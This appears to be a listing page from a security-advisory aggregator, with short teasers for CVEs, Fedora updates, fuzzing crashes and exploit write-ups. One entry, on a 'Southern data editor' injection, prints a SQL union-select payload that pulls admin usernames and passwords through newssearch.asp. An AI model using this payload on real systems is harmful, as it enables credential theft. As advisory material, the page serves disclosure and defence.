OSV-2026-649 Container-overflow in OGRGeometryFactory::organizePolygons

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=506932597 Crash type: Container-overflow WRITE 1 Crash state: OGRGeometryFactory::organizePolygons OGRCreateFromShapeBin OpenFileGDB::FileGDBOGRGeometryConverterImpl::CreateCurveGeometry...

[SECURITY] Fedora 44 Update: shotwell-33~alpha-9.fc44

Shotwell is an easy-to-use, fast photo organizer designed for the GNOME desktop. It allows you to import photos from your camera or disk, organize them by date and subject matter, even ratings. It also offers basic photo editing, like crop, red-eye correction, color adjustments, and straighten...

CVE-2024-26655

In the Linux kernel, the following vulnerability has been resolved: Fix memory leak in posixclockopen If the clk ops.open function returns an error, we don't release the pccontext we allocated for this clock. Re-organize the code slightly to make it all more obvious...

Fedora: Security Advisory for xml-commons-apis (FEDORA-2024-129d8ca6fc)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

New Year, New Threats: 4 Tips to Activate Your Best Cyber-Defense

As we enter into a new year full of uncertainty, one thing for cybersecurity practitioners remains true: You have a strategic advantage over adversaries. It may sound obvious to say, but they’re launching attacks against you, within your environment, which you control – giving you a fundamental...

SnipCommand 0.1.0 - XSS to Remote Command Execution Vulnerability

Exploit Title: SnipCommand 0.1.0 - XSS to RCE Exploit Author: TaurusOmar CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Risk: High 8.8 Vendor Homepage: https://github.com/gurayyarar/SnipCommand Version: 0.1.0 Tested on: Windows, Linux, MacOs Software Description: Open source command snippets manage...

Snupps: Collect Organize Share - Customized SSL, Redefined SSL Common Names verifier, WebView code execution vulnerabilities

HackApp vulnerability scanner discovered that application Snupps: Collect Organize Share published at the 'play' market has multiple vulnerabilities...

Authentication flaw

The 1 reports API and 2 administration feature in the comments API in the Ushahidi Platform before 2.5 do not require authentication, which allows remote attackers to generate reports and organize comments via API functions...

Southern data editor(southidceditor)injection 0day vulnerabilities-vulnerability warning-the black bar safety net

Injection point:newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may beanother versionnewssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...

Eventum Issue Tracking System 2.3.1 stored cross site scripting vulnerability-vulnerability warning-the black bar safety net

Eventum Issue Tracking System is a user-friendly interface and flexible bug tracking system, it can help the development team to quickly organize tasks and bugs. Eventum Issue Tracking System 2.3.1 the presence of the stored cross site scripting vulnerability that could cause users to...

Wmshop 6.0 Password Disclosure

Cyber-Warrior & Security TIM - Bug Researchers Group Application Name : Wmshop 6.0 - 5.08 Vulnerable Type : Arbitrary Forum Password Disclosure Vulnerability Infection : Forum Password Get... Author : Septemb0x Script Down.& WebSite : http://s2.dosya.tc/wmshop6.0.rar.html -...